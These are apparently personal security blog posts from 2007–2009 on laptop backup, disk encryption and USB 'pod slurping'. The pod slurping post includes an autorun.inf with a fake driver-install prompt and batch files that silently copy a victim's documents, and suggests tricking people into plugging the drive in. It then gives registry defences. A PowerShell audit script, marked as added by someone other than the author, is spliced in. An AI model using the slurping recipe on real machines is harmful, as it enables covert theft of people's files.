In Part 1, we discussed hard disk encryption for the mobile warrior. Hard disk encryption can be used by anyone who uses a computer, since security applies to any system, in a manner of speaking. This is what makes it so interesting.
In Part 2 of the Mobile Warrior, I would like to highlight the importance of BACKUP. Yes, I capitalized it so that it catches your eye. Your laptop is now lost, with the data in it safely out of the thief's reach, or, the more common event, your hard disk has CRASHED. What you need to do is get back to business ASAP.
You will understand the pain of getting back if either of the two events has happened to you. If not, one of the two will happen at some point in your very-lucky-so-far life.
A FreeAgent from Seagate (http://www.seagate.com/) or similar will be handy. Get the biggest hard disk you can afford, so that you can back up not only your laptop but also some of the data on your home PC; the software that comes with it should be FREE.
If you want to be super sure, try burning some of the critical files to DVD. Talk about high availability. Test the backup by recovering it to your home PC. With backups scheduled and tested, you can have a good, peaceful sleep. Enjoy.
Monday, December 31, 2007
Monday, December 24, 2007
Mobile Warrior - Part 1, Disk Encryption
As a mobile warrior, doing active work on our laptop is part of the daily routine. The laptop is the closest device to us next to the mobile phone.
We keep almost anything in it, personal and work matters alike. It is not common news that important data is lost and there are no proper means of protecting it.
Is the company to blame, or should we, as the data custodians, be responsible? These questions can open up a whole new can of worms for discussion, but we can take some simple measures into our own hands to ensure something is done, or at least that things are safe during our watch.
Thanks to the new power of Open Source, most of the applications are free, with quality equal to if not better than the paid versions. In addition, some measures are just simple changes in behavior and perspective that are, again, free.
To start off, let us consider disk encryption. The simple thing to do is to hide the data from easy access. This can be done with any encryption software that creates single or multiple folders that look like partitioned disks, which you can mount and dismount as needed.
A good example of such disk encryption software (Open Source) : http://www.truecrypt.org/
After playing with it, you might get addicted to having everything encrypted down to the last thumb drive, but remember to back up the key files as well as the good, strong password that you created.
If not, you will have more problems trying to recover it. Have fun.
Friday, December 21, 2007
iPod can be "malicious"...
Many of you may know about Pod Slurping. For the benefit of those who don't, Pod Slurping is the act of using a portable data storage device such as an iPod to illicitly download confidential data by plugging it directly into the computer where the data is held. We are talking about an iPod or USB flash drive that automatically copies files and data when it is connected to a USB port on the victim's system. It is the easiest way to "steal" information from an "innocent" victim without their knowledge.
Very often, you will see people sharing mp3 songs and document files by passing their iPod or USB drive. You can easily put a pod slurping script into your USB drive and trick the victim (with some mp3 songs) to plug it into his/her system.
How pod slurping works
1) To perform pod slurping, write a simple autorun setup file as below:
autorun.inf -
>[autorun]
>open begin.bat
>action=Click "OK" to install USB flash drive drivers
>shell\open\command=begin.bat
2) As seen in the autorun file, write a batch file "begin.bat" that minimises and runs the actual batch file that will copy all the "targeted" data.
begin.bat -
>@echo off
>@start /min slurp.bat /B
>@exit
3) Another batch file, "slurp.bat", is the actual batch file that copies all the data onto your USB drive. Write whatever DOS commands you like to "steal" the victim's data, such as:
> xcopy *.doc
How to protect against pod slurping
There are a few ways to protect against Pod Slurping. You can either (1) disable USB storage devices or (2) disable USB autorun.
1) To disable the use of USB storage devices: if a USB storage device is not already installed on the computer, set Deny permissions for the user or the group on the following files:
> %SystemRoot%\Inf\Usbstor.pnf
> %SystemRoot%\Inf\Usbstor.inf
If a USB storage device is already installed on the computer, set the "Start" value under the registry path "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor" to 4.
For the detailed steps, refer to Microsoft Technet (http://support.microsoft.com/kb/823732)
2) To disable USB autorun, set the "NoDriveTypeAutoRun" DWORD value under the registry path "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" to ff (255).
For the details, refer to Microsoft MSDN (http://msdn2.microsoft.com/en-us/library/bb776825.aspx)
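A read-only check of the two settings above, written as an added PowerShell example (not code from the original post). The registry paths and value names are the ones quoted above; the function names, the report text and the drive-type table for the NoDriveTypeAutoRun bits are additions made for this example, and the value is assumed to be stored as a DWORD.

```powershell
# Added example: read-only audit of the two registry settings described above.
# Function names and report text are made up for this example.

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or the value does not exist.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -ne $item) { $item.$Name } else { $null }
}

function Get-AutoRunDriveTypes {
    param([int]$Mask)
    # NoDriveTypeAutoRun is a bitmask: a set bit turns AutoRun OFF for that type.
    $types = @(
        @{ Bit = 0x01; Name = 'Unknown' },
        @{ Bit = 0x04; Name = 'Removable' },
        @{ Bit = 0x08; Name = 'Fixed' },
        @{ Bit = 0x10; Name = 'Network' },
        @{ Bit = 0x20; Name = 'CD-ROM' },
        @{ Bit = 0x40; Name = 'RAM disk' }
    )
    foreach ($t in $types) {
        [pscustomobject]@{
            DriveType       = $t.Name
            AutoRunDisabled = [bool]($Mask -band $t.Bit)
        }
    }
}

$usbStor  = 'HKLM:\SYSTEM\CurrentControlSet\Services\UsbStor'
$explorer = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'

$start = Get-RegValue -Path $usbStor -Name 'Start'
if ($null -eq $start) {
    'UsbStor: key or Start value not found; check the Deny permissions on Usbstor.inf/.pnf'
} elseif ($start -eq 4) {
    'UsbStor: Start = 4, USB storage driver is disabled'
} else {
    "UsbStor: Start = $start, USB storage driver can load"
}

$mask = Get-RegValue -Path $explorer -Name 'NoDriveTypeAutoRun'
if ($null -eq $mask) {
    'NoDriveTypeAutoRun: not set for the current user'
} else {
    'NoDriveTypeAutoRun = 0x{0:X2}' -f $mask
    Get-AutoRunDriveTypes -Mask $mask | Format-Table -AutoSize
    if ($mask -ne 0xFF) { 'Value differs from the ff (255) recommended above' }
}
```

Run it in the session of the user being checked, since the AutoRun value above lives under HKEY_CURRENT_USER.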
So the next time you share files from a USB storage device, make sure nothing "sensitive" is "secretly" copied out of your system.
Updated on 26 February 2009 -
US-CERT released an announcement on 20th Jan 09, stating that "Microsoft Windows does not disable AutoRun properly". In the announcement, they claim that "Disabling AutoRun on Microsoft Windows systems can help prevent the spread of malicious code. However, Microsoft's guidelines for disabling AutoRun are not fully effective, which could be considered a vulnerability." Viruses, such as the Conficker worm, are using AutoRun to spread.
Microsoft released a support knowledge base article, "Article ID: 967715 - How to correct "disable Autorun registry key" enforcement in Windows", on 24 Feb 09 to provide detailed steps for disabling AutoRun in Windows. They also released a security advisory, Update for Windows Autorun (KB967940), with a patch to correct the AutoRun functionality.
